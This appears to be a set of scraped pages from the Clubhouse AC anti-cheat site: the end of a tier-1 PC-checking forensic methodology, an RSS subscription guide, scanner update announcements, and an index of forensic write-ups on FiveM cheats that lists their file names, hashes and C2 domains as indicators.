or on specific triggers. Cheats can use scheduled tasks for persistence or to run cleanup scripts. 2 tools2 locations1 command ### Startup Folder & Startup Entries Programs can be set to launch at startup via the Startup folder, Registry Run keys, or Task Manager startup entries. 1 tool3 locations T1 Live System ----------- 4 ### Process List Analysis Live process inspection shows what's currently running. During a live SS, this is the first thing to check — cheats may still be active in memory. 1 tool1 command ### Handles & DLL Injection DLL injection is the most common method for injecting cheats into a game process. A malicious DLL is loaded into the game's memory space. Handle inspection shows what files and objects each process has open. 3 tools ### Unsigned Driver & Kernel Driver Check Kernel-level cheats and anti-cheat bypasses load as drivers (.sys files). Unsigned or unknown drivers are a major red flag. 2 tools1 command ### GPU & Overlay Tool Checks Some cheats use GPU overlays or hooking into the DirectX/Vulkan rendering pipeline to display ESP, aimbot indicators, or other visual cheats. These may not appear as traditional processes. 2 tools T1 Network & Devices ----------------- 2 ### DNS Cache & Network Artifacts The DNS cache stores recent domain lookups. If a cheat phones home or downloads updates, the domain will be cached. Network adapters can also reveal virtual machines or VPN bypasses. 1 tool1 command ### External Device History (USBSTOR) Windows logs every USB storage device ever connected in the USBSTOR registry key. This includes the device name, serial number, and first/last connection timestamps. Cheats can be loaded from USB drives and then disconnected. 3 tools2 locations T1 Advanced -------- 4 ### Hidden & Extensionless Executables Cheats can be disguised by removing file extensions, changing them (.txt, .jpg), or marking files as hidden/system. The file header (magic bytes) reveals the real type regardless. 3 tools ### Java Execution Traces Some cheat loaders are written in Java (.jar files). Java execution leaves traces in Prefetch, temp folders, and AppData. 1 command ### SRUM (System Resource Usage Monitor) SRUM tracks application resource usage over 30-60 days. It records which programs ran, how long, how much network data they used, and more — even after the program is deleted. 1 tool1 location1 command ### Anti-Cheat Bypass Artifact Scanning This is the big-picture check. Correlate evidence across ALL methods to identify patterns of bypass activity. A single artifact might not mean much, but multiple indicators together paint a clear picture. T1 Tools ----- 1 ### Service Checker Script A PowerShell script that checks the status of key Windows services and flags any that could indicate tampering or performance issues. Two combinations are auto-fail: SysMain OFF, or both PcaSvc + DPS OFF. 1 command The Golden Rule — Tier 1 No single artifact tells the whole story. Cross-reference EVERYTHING. Timeline it. Correlate it. Trust the pattern. [Next\ \ Tier 2 · Advanced](https://clubhouseac.shop/research/pc-checking-methods/tier-2) --- # Subscribe — Clubhouse AC Research · Clubhouse AC [Back to research](https://clubhouseac.shop/research) RSS Feed Follow the research =================== We publish new cheat disclosures, BYOVD writeups, and forensic methodologies regularly. Subscribe via RSS to get notified the moment something new drops — no email, no account, no algorithm deciding what you see. Feed URL `https://clubhouseac.shop/research/rss.xml`[Open feed](https://clubhouseac.shop/research/rss.xml) Copy the URL above and paste it into any RSS reader. Most readers will auto-detect the feed if you just enter `clubhouseac.shop/research`. What is RSS? ------------ RSS (Really Simple Syndication) is a feed format that lets you subscribe to any website without handing over your email. Your RSS reader checks the feed automatically and shows you new posts in a clean timeline — like a personal news feed you control. No tracking, no ads, no algorithm. Just our latest research as soon as we publish it. Pick a reader ------------- Don't have an RSS reader yet? Here are the most popular options. FeedlyWeb · Free The most popular RSS reader. Works in your browser, has mobile apps, and a clean unified inbox for everything you follow. [Add to Feedly](https://feedly.com/i/subscription/feed/https%3A%2F%2Fclubhouseac.shop%2Fresearch%2Frss.xml) InoreaderWeb · Free tier Power-user RSS reader with rules, filters, and Discord/Telegram integrations. Great for security researchers tracking many sources. [Add to Inoreader](https://www.inoreader.com/?add_feed=https%3A%2F%2Fclubhouseac.shop%2Fresearch%2Frss.xml) NetNewsWireiOS / macOS · Free Open-source, no account required, syncs with iCloud. Just open the app, paste the feed URL, done. [Download](https://netnewswire.com/) ThunderbirdDesktop · Free Mozilla's email client also reads RSS. If you already use Thunderbird, just add the feed to your account list. [Download](https://www.thunderbird.net/) Post research drops to a Discord server --------------------------------------- If you run a server (FiveM admins, security researchers, anti-cheat ops), an RSS bot can post new research to a channel automatically. The most common option is **MonitorRSS**: 1. 1Invite the MonitorRSS bot to your server from [monitorss.xyz](https://monitorss.xyz/) . 2. 2Run `/add feed-link:https://clubhouseac.shop/research/rss.xml` in the channel where you want updates. 3. 3That's it. New research will post automatically — usually within minutes of publication. Or just bookmark the feed ------------------------- If you only want to follow this one feed, you don't need a reader at all. Bookmark [the feed URL](https://clubhouseac.shop/research/rss.xml) and check it whenever. Browsers like Firefox can also display RSS feeds directly if you have the _Want My RSS_ extension installed. That's the whole guide. RSS has been around for 25 years and it's still the most reliable way to follow a publication without giving up your inbox or letting an algorithm decide what you see. Welcome aboard. [Back to research](https://clubhouseac.shop/research) [Open the feed](https://clubhouseac.shop/research/rss.xml) --- # Clubhouse AC — Forensic PC Scanning for Game Servers [Back to home](https://clubhouseac.shop/) Latest updates Blog ==== Server updates, announcements, and important notices — straight from the Discord. AnnouncementMar 11, 2026, 2:44 AM Addressing False Flags & Improving Detection Posted via Discord by hyper674 We’re aware that recent updates have caused a noticeable number of false flags. Thank you for your patience and for reporting these issues your feedback is helping us improve. Were actively working to fine tune detection so that reports are more accurate while still catching hidden cheats. We appreciate you choosing Clubhouse AC and for helping us make the scanner smarter and more reliable every day. — The Clubhouse AC Team UpdateMar 11, 2026, 2:07 AM Smarter, Faster, Cleaner Posted via Discord by hyper674 Our latest scanner update is here! Detection is now smarter at spotting hidden cheats, reports are cleaner with fewer false flags UpdateMar 10, 2026, 5:06 AM Scanner Stability Issue Fixed for Clubhouse AC Users Posted via Discord by hyper674 We’re happy to share that the scanner stability issue that caused crashes for some users has now been fixed. We have identified the root cause and implemented a solution to ensure the scanner runs smoothly and reliably. The fix is now live, and users should no longer experience the crashes that were previously reported. We appreciate your patience while we worked to resolve this issue and thank everyone who reported the problem and provided feedback. If you continue to experience any issues, please contact our support team so we can assist you. Thank you for being a valued member of the Clubhouse AC community. — The Clubhouse AC Team MaintenanceMar 9, 2026, 1:01 PM Update on Scanner Stability Issue for Clubhouse AC Users Posted via Discord by hyper674 Dear Clubhouse AC Customers, We want to let you know that we are aware some users have experienced crashes while using our scanner. Your experience is very important to us, and we are actively working on a fix to resolve this issue as quickly as possible. Our development team is fully engaged in identifying the root cause and implementing a solution that ensures the scanner runs smoothly and reliably. We appreciate your patience and understanding while we work through this. We will keep you updated here on our blog and through our social channels as soon as a stable update is available. In the meantime, if you encounter issues, please contact our support team for assistance. Thank you for being a valued member of the Clubhouse AC community. — The Clubhouse AC Team UpdateMar 9, 2026, 5:44 AM Our Most Advanced Forensic Update Yet Posted via Discord by hyper674 We’ve taken cheat detection to the next level. Our latest update unlocks unprecedented forensic capabilities that catch cheats even after they try to erase every trace. By pioneering durable artifact detection—covering everything from registry remnants and NTFS timeline residue to memory hooks, kernel tampering, and hardware spoofing --- # Security Research · Clubhouse AC Clubhouse AC Research Forensic research from the field ================================ Case studies, detection methodologies, and artifact-chain breakdowns from the Clubhouse AC research team. We publish what we learn investigating real cheat ecosystems — kernel-mode tooling, anti-forensic suites, hardware DMA boards, and the techniques used to evade live anti-cheats. Coordinated disclosure where applicableDefensive use only66 published notes[Subscribe via RSS](https://clubhouseac.shop/research/rss "Subscribe to the Clubhouse AC Research RSS feed") Featured Latest case studies ------------------- [Disclosure Response\ \ Critical\ \ ### ClubXJefe Disclosure Response — Claim-by-Claim Rebuttal and Counter-Disclosure\ \ A competing FiveM cheat vendor published a long-form accusation alleging the Clubhouse scanner is an infostealer. We answer every claim against the actual scanner source — including Wi-Fi password access, browser token exfiltration, wallet harvesting, and kernel hooking claims — and then publish a capability-level counter-disclosure of the accuser's own BYOVD loader and the affiliated reseller binary, both of which add persistence, kernel tampering, Discord OAuth identity capture, and wholesale browser-token exfiltration that the scanner does not perform.\ \ DisclosureCounter-DisclosureBYOVDInfostealerFiveMPrivacy\ \ Clubhouse AC Research·Jun 25, 2026·22 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/clubxjefe) [Cheat Detection\ \ Critical\ \ ### Phase.uno Cheat Suite — Full Reverse Engineering of 8 PE Modules\ \ Complete reverse engineering of the Phase.uno multi-game cheat suite: 8 PE modules targeting 9 games. Fileless no-EXE launch via Spotify.exe process hosting, services.msc SCM injection chain into svchost:Dnscache, WFP domain blocking, system process injection, streamproof overlays, NtQuerySystemInformation hooking, manual mapping, thread context hijacking, and AES-GCM encrypted C2. Includes 8 YARA rules (including post-destruct detection) and comprehensive IOCs.\ \ Phase.unoWFPManual MappingProcess InjectionStreamproofFiveM\ \ Clubhouse AC Research·Jun 19, 2026·35 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/phase-uno-cheat-suite) [Methodology\ \ Info\ \ ### PC Checking Methods — Tiered Forensic Methodology\ \ A complete methodology for PC checks (screenshares, SS) organised into five escalating tiers — from a 10-minute foundation triage of execution artifacts and persistence locations, through deep-dive NTFS reconstruction, memory forensics, court-grade DFIR with full disk imaging and chain of custody, all the way to overwrite-bypass detection and cross-source contradiction analysis. Catalogues 130+ techniques across every Windows artifact, parser, and bypass pattern.\ \ PC CheckingMethodologyTiersDFIRForensics\ \ Clubhouse AC Research·May 7, 2026·60 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/pc-checking-methods) [Kernel Forensics\ \ Critical\ \ ### Detecting BYOVD Chains Through Kernel Callback Forensics\ \ Bring-Your-Own-Vulnerable-Driver attacks rely on legitimately-signed but exploitable kernel drivers (mhyprot2, GIGABYTE gdrv, Dell dbutil) to disable EDR callbacks. We document a forensic methodology that reconstructs the load order, callback unregistration, and signing-chain anomalies after the driver has been unloaded — leaving only USN journal traces, registry remnants, and prefetch artifacts.\ \ BYOVDKernelDriver SigningEDR BypassUSN Journal\ \ Clubhouse AC Research·Apr 12, 2026·14 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/byovd-rtcore-chain) [Anti-Forensics\ \ High\ \ ### Reconstructing Cheat Execution After Cleaner-Tool Sweeps\ \ Cheat-cleaner utilities (BleachBit forks, custom .bat scripts, Privazer presets) wipe the obvious execution traces — Prefetch, BAM, recent docs. We show how Amcache, ShimCache, RecentFileCache.bcf, and registry transaction logs (LOG1/LOG2) preserve enough fragments to reconstruct a complete execution timeline for the Eulen FiveM executor family with 47-second resolution.\ \ PrefetchAmcacheShimCacheRegistry ForensicsFiveM\ \ Clubhouse AC Research·Mar 28, 2026·11 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/eulen-prefetch-recovery) All research notes Methodology & detection ----------------------- 63 more notes [Anti-Forensics\ \ Medium\ \ ### MFT $SI vs $FN: Detecting Timestomping on NTFS\ \ Timestomping tools rewrite the $STANDARD\_INFORMATION attribute but typically miss $FILE\_NAME, which is updated only by the kernel during file rename or move. We detail a $SI/$FN delta detection rule that flagged 100% of timestomp attempts in our corpus of 312 known cheat-loader samples — including subsecond manipulation that evades naive timestamp checks.\ \ NTFSMFTTimestompingDFIR\ \ Clubhouse AC Research·Mar 10, 2026·9 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/timestomp-mft-detection) [Hardware\ \ High\ \ ### DMA Hardware Fingerprinting: PCILeech and Squirrel Detection\ \ Hardware DMA cheats (PCILeech, Squirrel, custom FPGA boards) advertise themselves on the PCIe bus through Vendor/Device ID, BAR layout, and configuration space anomalies. We catalogue the signatures of seven publicly-sold DMA boards and document a configuration-space probe that distinguishes legitimate capture cards from attack hardware.\ \ DMAPCIeHardware CheatsFPGA\ \ Clubhouse AC Research·Apr 4, 2026·12 min\ \ Disclosure pending\ \ Read research](https://clubhouseac.shop/research/dma-pcie-fingerprinting) [Identity\ \ Medium\ \ ### HWID Spoofer Rotation Detection via SMBIOS + ACPI Cross-Reference\ \ HWID spoofers rotate visible identifiers (MachineGuid, MAC, disk serials) but rarely touch every cross-domain identifier consistently. We correlate SMBIOS Type 1/2/3 fields against ACPI \_UID values, EFI variables, and TPM EK certificates to surface rotation events even when individual identifiers appear clean.\ \ HWIDSMBIOSACPITPM\ \ Clubhouse AC Research·Feb 22, 2026·10 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/hwid-rotation-smbios) [Kernel Forensics\ \ High\ \ ### PsSetCreateProcessNotifyRoutine: Detecting Callback Unhooking\ \ Kernel-mode cheats unregister Windows process-creation callbacks to evade EDR telemetry. We walk the PspCreateProcessNotifyRoutine array post-mortem from a memory snapshot to identify gaps and replaced entries — including the signature pattern left by the public hwbp1 unhook PoC.\ \ KernelCallbackEDRMemory Forensics\ \ Clubhouse AC Research·Apr 18, 2026·13 min\ \ Draft](https://clubhouseac.shop/research#) [Kernel Forensics\ \ High\ \ ### Detecting ETW Provider Tampering: Patch, Disable, and Spoof\ \ Cheat loaders that patch EtwEventWrite to a bare return, disable providers via NtTraceControl, or forge event payloads leave structural traces in the ETW metadata tables and session descriptors. We enumerate four distinct tampering techniques observed in the wild and document the kernel-side consistency checks that detect each one without relying on the event stream itself.\ \ ETWKernelAnti-TelemetryDFIR\ \ Clubhouse AC Research·Mar 5, 2026·11 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/etw-tampering-detection) [Memory Forensics\ \ High\ \ ### Process Hollowing Detection via VAD and Section Object Cross-Reference\ \ Classic process hollowing overwrites legitimate image sections with injected code, leaving the VAD (Virtual Address Descriptor) tree claiming a mapped image path that no longer matches the on-disk binary or the in-memory PEB LDR entries. We detail a detection technique that cross-references VAD node ImageFilePointer, the PEB Ldr InMemoryOrderModuleList, and the mapped section object hash to surface hollowed and stomped-image processes with a 1.8% false-positive rate on clean game populations.\ \ Process HollowingVADPEBMemory Forensics\ \ Clubhouse AC Research·Jan 30, 2026·13 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/process-hollowing-section-detection) [Cheat Detection\ \ High\ \ ### TZX Project FiveM Cheat: Detection & Forensic Artifacts\ \ Forensic breakdown of TZX Project (taskthow.exe), a FiveM cheat that shares C2 infrastructure with TZ Project but is a distinct binary. Key artifact: drops packages.json into C:\\Windows\\System32 — visible via Journal Trace. Covers DNS, lsass, and FiveM process C2 strings alongside a seven-step screenshare check methodology.\ \ FiveMCheat DetectionSystem32IOC\ \ Clubhouse AC Research·Jun 1, 2026·8 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/tzx-fivem-detection) [Cheat Detection\ \ High\ \ ### Red Engine FiveM Cheat: Detection & Forensic Artifacts\ \ Forensic breakdown of Red Engine (Chaga.exe), a FiveM cheat that writes imgui.ini to the GTA V folder and leaves settings.cock and settings.cook configuration files in its loader directory alongside INSTRUCTIONS.txt. Windows Defender flags the binary. C2 domain falcon.redengine.eu observed in DNS cache.\ \ FiveMCheat DetectionImGuiDefender Detection\ \ Clubhouse AC Research·Jun 1, 2026·9 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/redengine-fivem-detection) [Cheat Detection\ \ High\ \ ### Skript.gg FiveM Cheat: Detection & Forensic Artifacts\ \ Forensic breakdown of Skript.gg (ts3client\_win64.exe), a FiveM cheat that masquerades as the TeamSpeak 3 client and is also known to use the USBDeview utility name. Covers skript.gg C2 strings in lsass.exe, DiagTrack artifacts, DLL presence in Explorer, Journal Trace evidence, and Disk Drill file recovery from unallocated space.\ \ FiveMCheat DetectionProcess MasqueradeDiagTrack\ \ Clubhouse AC Research·Jun 1, 2026·9 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/skriptgg-fivem-detection) [Cheat Detection\ \ High\ \ ### Gosth FiveM Cheat: Detection & Forensic Artifacts\ \ Forensic breakdown of Gosth, a FiveM cheat distributed via direct CDN URL (cdn.gosth.ltd/launcher.exe) that injects into arbitrary processes. Key indicators: loader entry persists in NVIDIA Control Panel, launcher.exe visible in DiagTrack under \\device\\, random .tmp file in %TEMP%, Prefetch and Windows Data Usage records survive cleanup.\ \ FiveMCheat DetectionDiagTrackNVIDIA\ \ Clubhouse AC Research·Jun 1, 2026·8 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/gosth-fivem-detection) [Cheat Detection\ \ High\ \ ### Keyser FiveM Cheat: Detection & Forensic Artifacts\ \ Forensic breakdown of Keyser (loader.exe), a FiveM cheat that drops a DLL into C:\\Windows\\IME and creates .dmp crash dump files in unusual locations. C2 domain api.keyser-dashboard.com observed in DNS cache and lsass.exe. Covers Journal Trace, WinPrefetchView, and IME directory inspection.\ \ FiveMCheat DetectionWindows IMEDMP Files\ \ Clubhouse AC Research·Jun 1, 2026·9 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/keyser-fivem-detection) [Cheat Detection\ \ High\ \ ### Unicore FiveM Cheat: Detection & Forensic Artifacts\ \ Forensic breakdown of Unicore (build.exe), a FiveM cheat that communicates via an OVH VPS hostname and actively manipulates the DIPS journal file. The string 'Unicore' appears in the FiveM game process memory. Covers DNS artifacts, Event Viewer entries, Journal Trace, and Prefetch evidence.\ \ FiveMCheat DetectionDIPS JournalEvent Viewer\ \ Clubhouse AC Research·Jun 1, 2026·9 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/unicore-fivem-detection) [Cheat Detection\ \ High\ \ ### HX Software FiveM Cheat: Detection & Forensic Artifacts\ \ Forensic breakdown of HX Software (updated.exe), a FiveM cheat that uses a generic update-process name to avoid suspicion. C2 domain api.hxsoftwares.com observed simultaneously in DNS cache, lsass.exe, and the FiveM game process. Covers Journal Trace evidence and a six-step screenshare check methodology.\ \ FiveMCheat DetectionProcess MasqueradeMemory Forensics\ \ Clubhouse AC Research·Jun 1, 2026·8 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/hxsoftware-fivem-detection) [Cheat Detection\ \ High\ \ ### Macho Cheats FiveM Cheat: Detection & Forensic Artifacts\ \ Forensic breakdown of Macho Cheats (Yb6ul.exe / mc.exe), a FiveM cheat that extracts its loader into a %TEMP% folder and bundles libcurl.dll and fivem-internal.dll. C2 domain machocheats.com found in DNS, lsass.exe, and FiveM process. Covers DiagTrack artifacts, WinPrefetchView, browser history, and Journal Trace.\ \ FiveMCheat DetectionBundled DLLTEMP Folder\ \ Clubhouse AC Research·Jun 1, 2026·9 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/machocheats-fivem-detection) [Cheat Detection\ \ High\ \ ### Keyser Cracked Build: Detection & Forensic Artifacts\ \ Forensic breakdown of the cracked/leaked Keyser build (keycheese), which uses a separate C2 domain (api.keyser-lts.com) from the official loader. Shares the IME DLL-drop behavior with the official build. Covers DNS, lsass, FiveM process C2 strings, C:\\Windows\\IME artifact, Journal Trace, and loader UI identification.\ \ FiveMCheat DetectionCracked BuildWindows IME\ \ Clubhouse AC Research·Jun 1, 2026·9 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/keyser-cracked-fivem-detection) [Cheat Detection\ \ High\ \ ### TZ Project FiveM Cheat: Detection & Forensic Artifacts\ \ Forensic breakdown of TZ Project (firefox.exe), a FiveM cheat loader that masquerades as a browser process to evade casual process-list inspection. Documents the imgui.ini artifact written to the GTA V folder, C2 domain artifacts in DNS cache and LSASS memory, DPS first-seen timestamp, and a seven-step screenshare check methodology.\ \ FiveMCheat DetectionProcess MasqueradeImGui\ \ Clubhouse AC Research·Jun 1, 2026·9 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/tzproject-fivem-detection) [Cheat Detection\ \ High\ \ ### Susano FiveM Cheat: Detection & Forensic Artifacts\ \ Forensic breakdown of Susano (lemon.exe), a FiveM-targeted cheat loader. Documents C2 string artifacts found in lsass.exe and svchost.exe memory, ~40 MB working-set inflation in the FiveM process with WCX-protected injected regions, USN Journal records that survive the cheat's stealth-mode Prefetch wipe, and a complete seven-step screenshare check methodology.\ \ FiveMCheat DetectionMemory ForensicsUSN Journal\ \ Clubhouse AC Research·Jun 1, 2026·10 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/susano-fivem-detection) [Cheat Detection\ \ High\ \ ### Xine FiveM Cheat: Detection & Forensic Artifacts\ \ Forensic breakdown of Xine (XineTeamCheat.exe), a free FiveM cheat also distributed disguised as a NordVPN installer. Key artifacts include a config.json file left on the desktop, Event Viewer entries, Journal Trace confirmation of XineTeamCheat.exe, and Prefetch records. Detection requires no C2 DNS — the config file and journal entry are sufficient.\ \ FiveMCheat DetectionJournal TracePrefetch\ \ Clubhouse AC Research·Jun 2, 2026·7 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/xine-fivem-detection) [Cheat Detection\ \ High\ \ ### D3d10.dll FiveM Cheat: Detection & Forensic Artifacts\ \ Forensic breakdown of the d3d10.dll FiveM cheat, a DLL-based cheat injected into the game process using the DirectX DLL name as cover. Key artifacts include browser download records, FiveM crash dump files, Echo Journal traces, Windows Defender detections, and d3d10.dll presence in System Informer's Explorer module list.\ \ FiveMCheat DetectionDLL InjectionJournal Trace\ \ Clubhouse AC Research·Jun 2, 2026·7 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/d3d10-fivem-detection) [Cheat Detection\ \ High\ \ ### MrCheat (Turkish Kebab) FiveM Cheat: Detection & Forensic Artifacts\ \ Forensic breakdown of MrCheat, also known as Turkish Kebab (Loader.exe). SHA-1: 5c568ed13cae97ab5bb20fbe3e70032d610c4f2f. C2 domain api.mrcheat.api-ir observed in DNS cache. DPS: 2025/02/08. PcaSvc: 0x67b000. Covers Prefetch, Journal Trace, System Informer Explorer, and VirusTotal detections.\ \ FiveMCheat DetectionDNSPrefetch\ \ Clubhouse AC Research·Jun 2, 2026·8 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/mrcheat-fivem-detection) [Cheat Detection\ \ High\ \ ### Ambani FiveM Cheat: Detection & Forensic Artifacts\ \ Forensic breakdown of the Ambani FiveM cheat. SHA-256: c56f83f54e6ad7fcdd060592ebb8d794cfb9c1ba955f97028cfc6d69d30fea32. Flagged by Windows Defender. Key artifacts include System Informer showing injection into msedge.exe, Prefetch parser records, and detailed VirusTotal detections across multiple engines.\ \ FiveMCheat DetectionWindows DefenderPrefetch\ \ Clubhouse AC Research·Jun 2, 2026·8 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/ambani-fivem-detection) [Cheat Detection\ \ High\ \ ### Bang Service TriggerBot: Detection & Forensic Artifacts\ \ Forensic breakdown of the Bang Service TriggerBot (Bang\_Keyboardtweak.exe). SHA-256: 9ee8d3d053d3891c480dd591cbf54fbfd336d976d61fe38d705ad22873f02144. DPS: 2026/01/17. PcaSvc: 0x5d000. Covers VirusTotal detections, Everything tool file search, and Prefetch records confirming execution.\ \ FiveMTriggerBotCheat DetectionPrefetch\ \ Clubhouse AC Research·Jun 2, 2026·7 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/bang-service-triggerbot-detection) [Cheat Detection\ \ High\ \ ### Kazo FiveM Cheat: Detection & Forensic Artifacts\ \ Forensic breakdown of the Kazo FiveM cheat. SHA-256: 48d0a3f845d7df80666b32a676126d9e4b0ad5cb286e532d155a38eb36276727. Covers VirusTotal multi-engine detections, file properties analysis showing anomalous metadata, and Everything tool search for locating cheat artifacts on disk.\ \ FiveMCheat DetectionVirusTotalEverything Tool\ \ Clubhouse AC Research·Jun 2, 2026·7 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/kazo-fivem-detection) [Cheat Detection\ \ High\ \ ### SSTB FiveM TriggerBot: Detection & Forensic Artifacts\ \ Forensic breakdown of SSTB, a multi-version FiveM triggerbot that hides its payload as a fake ffmpeg.dll (SHA-1: 7cbd8a2260baae33ec3f7a5b2427fbea14d2a9a5, ~2.631 KB) across four host applications: Obsidian/CitizenFX, SteelSeries GG, Insomnia, and Rocket.Chat v4. Detection via ffmpeg.dll size fingerprint and SHA-1 hash. Includes a complete ClubhouseAC scanner script.\ \ FiveMSSTBTriggerBotDLL Masquerade\ \ Clubhouse AC Research·Jun 2, 2026·10 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/sstb-fivem-detection) [Cheat Detection\ \ High\ \ ### SouthLoader FiveM Cheat: Detection & Forensic Artifacts\ \ Forensic breakdown of SouthLoader (SouthLoader.exe), a FiveM cheat that is also distributed bundled with a fake NVIDIA app installer (NVIDIA\_app\_v11.0.4.526.exe / Lexus\_Bundle\_Opti.rar). SHA-1: 676693d397b21e66d3b81063596816a51325f2d1. DPS: 2025/08/13. PcaSvc: 0x1ce5000.\ \ FiveMCheat DetectionNVIDIA MasqueradePcaSvc\ \ Clubhouse AC Research·Jun 2, 2026·7 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/southloader-fivem-detection) [Cheat Detection\ \ High\ \ ### Flyside FiveM Cheat: Detection & Forensic Artifacts\ \ Forensic breakdown of Flyside (distributed as cmd.exe), a FiveM cheat with C2 at gm07-dc04.ouiheberg.com that drops TModule.dll to the root of C:\\. SHA-256: 01939a2b6ac191c4afb03884c0e6f172c2332c4e4bf4f516718b585541dd31c4. Covers BAM parser, Everything tool, Journal Trace, WinPrefetchView, LastActivityView, and OSForensics.\ \ FiveMCheat DetectionTModule.dllJournal Trace\ \ Clubhouse AC Research·Jun 2, 2026·9 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/flyside-fivem-detection) [Cheat Detection\ \ High\ \ ### FiveM.exe Cheat Loader: Detection & Forensic Artifacts\ \ Forensic breakdown of a FiveM cheat loader distributed as FiveM(1).exe to blend into a player's existing FiveM installation. SHA-1: 7e8c2cf77fbc5d729f0ac151889c028f7ca2b8c3. Notable for an anomalous far-future DPS timestamp of 2077/11/16 — a clear indicator of deliberate timestamp manipulation. PcaSvc: 0x23a000.\ \ FiveMCheat DetectionFuture TimestampTimestomping\ \ Clubhouse AC Research·Jun 2, 2026·7 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/fivemexe-cheat-detection) [Cheat Detection\ \ High\ \ ### Traceless FiveM Cheat: Detection & Forensic Artifacts\ \ Forensic breakdown of Traceless (Traceless.exe), a FiveM cheat whose name implies anti-forensic capability but which leaves persistent DPS and PcaSvc execution artifacts. SHA-1: 63f856cb2ff834b82782386b43858672c1f46037. DPS: 2025/07/30. PcaSvc: 0x42d000.\ \ FiveMCheat DetectionAnti-Forensic ClaimPcaSvc\ \ Clubhouse AC Research·Jun 2, 2026·7 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/traceless-fivem-detection) [Cheat Detection\ \ High\ \ ### WhatsApp Installer FiveM Cheat: Detection & Forensic Artifacts\ \ Forensic breakdown of a FiveM cheat masquerading as WhatsApp\_Installer.exe to appear benign in process lists and download history. SHA-1: 22aee3373ad743cd7442e136a32082bedcfde5b9. Notable for a far-future DPS timestamp of 2049/07/01 — a red flag for timestamp manipulation. PcaSvc: 0x3284000.\ \ FiveMCheat DetectionProcess MasqueradeFuture Timestamp\ \ Clubhouse AC Research·Jun 2, 2026·7 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/whatsapp-installer-fivem-detection) [Cheat Detection\ \ High\ \ ### 420-Services FiveM Cheat: Detection & Forensic Artifacts\ \ Forensic breakdown of 420-Services (420-services.exe), a FiveM cheat loader from a vendor that also sells other cheats. SHA-1: 888a2575b2a1d8e68ec50a9204eee52700ae168a. DPS: 2025/10/22. PcaSvc: 0x10e6000. Covers file identification, hash confirmation, and PcaSVC execution evidence.\ \ FiveMCheat DetectionMulti-Cheat VendorPcaSvc\ \ Clubhouse AC Research·Jun 2, 2026·7 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/420-services-fivem-detection) [Cheat Detection\ \ High\ \ ### MW-Privat FiveM Cheat: Detection & Forensic Artifacts\ \ Forensic breakdown of MW-Privat (MWPriv+\_Cheat\_x64.exe), a FiveM cheat with 11 high-severity PE-level detections including WriteProcessMemory, NtWriteVirtualMemory, OpenProcess, and an Aimbot pattern. SHA-256: b21c2afe99160f24b403962b7b15b191b785c2a4b5c38f49a5cbd74bcfd0415c. DPS: 2026/01/19. PcaSvc: 0x75c000.\ \ FiveMCheat DetectionMemory InjectionAimbot\ \ Clubhouse AC Research·Jun 2, 2026·8 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/mwprivat-fivem-detection) [Cheat Detection\ \ High\ \ ### Trigger FiveM TriggerBot: Detection & Forensic Artifacts\ \ Forensic breakdown of a FiveM triggerbot distributed as Rechner.exe (German: 'calculator') to appear innocuous. SHA-256: 7078d61d9106cea38eeee6b495051473c5ec9cbba0a6eb399f5702ba576c9f79. Covers BAM parser and Prefetch record artifacts as the primary execution evidence.\ \ FiveMTriggerBotCheat DetectionBAM Parser\ \ Clubhouse AC Research·Jun 2, 2026·7 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/trigger-fivem-detection) [Cheat Detection\ \ High\ \ ### Aorist FiveM Cheat: Detection & Forensic Artifacts\ \ Forensic breakdown of Aorist (Aorist.exe), a FiveM cheat. SHA-256: cc6cbfaed2bb4b124c32d71d2c581a5e70c91fcd2c7b039526e54dc89855129a. DPS: 2025/06/05. PcaSvc: 0x2d1000. Covers Prefetch records and Everything tool file search for locating artifacts on disk.\ \ FiveMCheat DetectionPrefetchEverything Tool\ \ Clubhouse AC Research·Jun 2, 2026·7 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/aorist-fivem-detection) [Cheat Detection\ \ High\ \ ### Seryx FiveM Cheat: Detection & Forensic Artifacts\ \ Forensic breakdown of Seryx (Loader.exe), a FiveM cheat. SHA-256: 01a27b1ce601280792941524b4b108330eb2ffe3e0a0151e3ba44257c3585476. DPS: 2026/02/07. PcaSvc: 0x1c86000. Covers Everything tool search, BAM and Prefetch parser analysis, and execution timeline reconstruction from multiple artifact sources.\ \ FiveMCheat DetectionPrefetchBAM Parser\ \ Clubhouse AC Research·Jun 2, 2026·8 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/seryx-fivem-detection) [Cheat Detection\ \ High\ \ ### AnyDesk Loader FiveM Cheat: Detection & Forensic Artifacts\ \ Forensic breakdown of a FiveM cheat masquerading as AnyDesk (Anydesk.exe) to evade process-list inspection. SHA-256: e7a51618ad0ad0b7bf1b8f9f1d11cd04b793cb200bfb4065f3ad6b9f9acfeb47. DPS: 2025/12/11. 